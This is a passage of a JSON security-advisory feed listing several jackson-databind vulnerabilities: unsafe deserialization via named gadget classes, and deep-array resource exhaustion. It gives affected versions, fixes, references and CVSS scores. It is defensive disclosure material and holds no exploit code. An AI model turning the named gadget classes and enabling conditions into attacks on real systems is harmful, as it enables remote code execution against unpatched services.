"https://security.netapp.com/advisory/ntap-20200702-0003" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-18T13:05:54Z", "nvd_published_at": "2020-06-14T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jjjh-jjxp-wpff", "published": "2022-10-03T00:00:31Z", "modified": "2024-10-22T05:28:54.705123Z", "aliases": [ "CGA-cr64-vww2-xpq8", "CVE-2022-42003" ], "related": [ "CGA-9gmq-c996-778j", "CGA-fqmv-h753-pwr7", "CGA-jv4g-m8ph-wxx4", "CGA-qh53-92m3-qxq2" ], "summary": "Uncontrolled Resource Consumption in Jackson-databind", "details": "In FasterXML jackson-databind 2.4.0-rc1 until 2.12.7.1 and in 2.13.x before 2.13.4.2 resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. This was patched in 2.12.7.1, 2.13.4.2, and 2.14.0.\n\nCommits that introduced vulnerable code are \nhttps://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45, https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1, and https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc.\n\nFix commits are https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea and https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33.\n\nThe `2.13.4.1` release does fix this issue, however it also references a non-existent jackson-bom which causes build failures for gradle users. See https://github.com/FasterXML/jackson-databind/issues/3627#issuecomment-1277957548 for details. This is fixed in `2.13.4.2` which is listed in the advisory metadata so that users are not subjected to unnecessary build failures", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.4.0-rc1" }, { "fixed": "2.12.7.1" } ] } ], "versions": [ "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.5.1", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.6.1", "2.12.7", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.10.8", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-jjjh-jjxp-wpff/GHSA-jjjh-jjxp-wpff.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.4.2" } ] } ], "versions": [ "2.13.0", "2.13.1", "2.13.2", "2.13.2.1", "2.13.2.2", "2.13.3", "2.13.4", "2.13.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-jjjh-jjxp-wpff/GHSA-jjjh-jjxp-wpff.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42003" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3590" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3627" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5283" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221124-0004" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202210-21" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.13.4.1...jackson-databind-2.13.4.2" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commits/jackson-databind-2.4.0-rc1?after=75b97b8519f0d50c62523ad85170d80a197a2c86+174\u0026branch=jackson-databind-2.4.0-rc1\u0026qualified_name=refs%2Ftags%2Fjackson-databind-2.4.0-rc1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/blob/2.13/release-notes/VERSION-2.x" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-10-04T21:55:46Z", "nvd_published_at": "2022-10-02T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m6x4-97wx-4q27", "published": "2021-12-09T19:16:26Z", "modified": "2024-02-18T05:21:54.725837Z", "aliases": [ "CVE-2020-36184" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-m6x4-97wx-4q27/GHSA-m6x4-97wx-4q27.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36184" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2998" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/567194c53ae91f0a14dc27239afb739b1c10448a" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:30:19Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mc6h-4qgp-37qh", "published": "2020-06-18T14:44:43Z", "modified": "2024-03-15T00:47:36.920636Z", "aliases": [ "CVE-2020-14195" ], "summary": "Deserialization of untrusted data in Jackson Databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mc6h-4qgp-37qh/GHSA-mc6h-4qgp-37qh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14195" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2765" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200702-0003" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-18T13:05:45Z", "nvd_published_at": "2020-06-16T16:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mph4-vhrx-mv67", "published": "2019-07-05T21:07:27Z", "modified": "2024-03-15T01:16:21.467932Z", "aliases": [ "CVE-2019-12384" ], "summary": "Deserialization of Untrusted Data in FasterXML jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-mph4-vhrx-mv67/GHSA-mph4-vhrx-mv67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-mph4-vhrx-mv67/GHSA-mph4-vhrx-mv67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-mph4-vhrx-mv67/GHSA-mph4-vhrx-mv67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-mph4-vhrx-mv67/GHSA-mph4-vhrx-mv67.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12384" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2334" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/c9ef4a10d6f6633cf470d6a469514b68fa2be234" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1820" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef@%3Cdev.struts.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e0733058c0366b703e6757d8d2a7a04b943581f659e9c271f0841dfe@%3Cnotifications.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190703-0002" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2720" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2998" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3292" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3297" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3901" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4352" }, { "type": "WEB", "url": "https://blog.doyensec.com/2019/07/22/jackson-gadgets.html" }, { "type": "WEB", "url": "https://doyensec.com/research.html" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/74b90a4...a977aad" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9@%3Cdev.tomee.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-06-27T11:07:42Z", "nvd_published_at": "2019-06-24T16:15:15Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mx7p-6679-8g3q", "published": "2019-10-28T20:51:15Z", "modified": "2024-03-15T01:01:46.432481Z", "aliases": [ "CVE-2019-16942" ], "summary": "Polymorphic Typing in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-mx7p-6679-8g3q/GHSA-mx7p-6679-8g3q.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-mx7p-6679-8g3q/GHSA-mx7p-6679-8g3q.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-mx7p-6679-8g3q/GHSA-mx7p-6679-8g3q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16942" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2478" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/328a0f833daf6baa443ac3b37c818a0204714b0b" }, { "type": 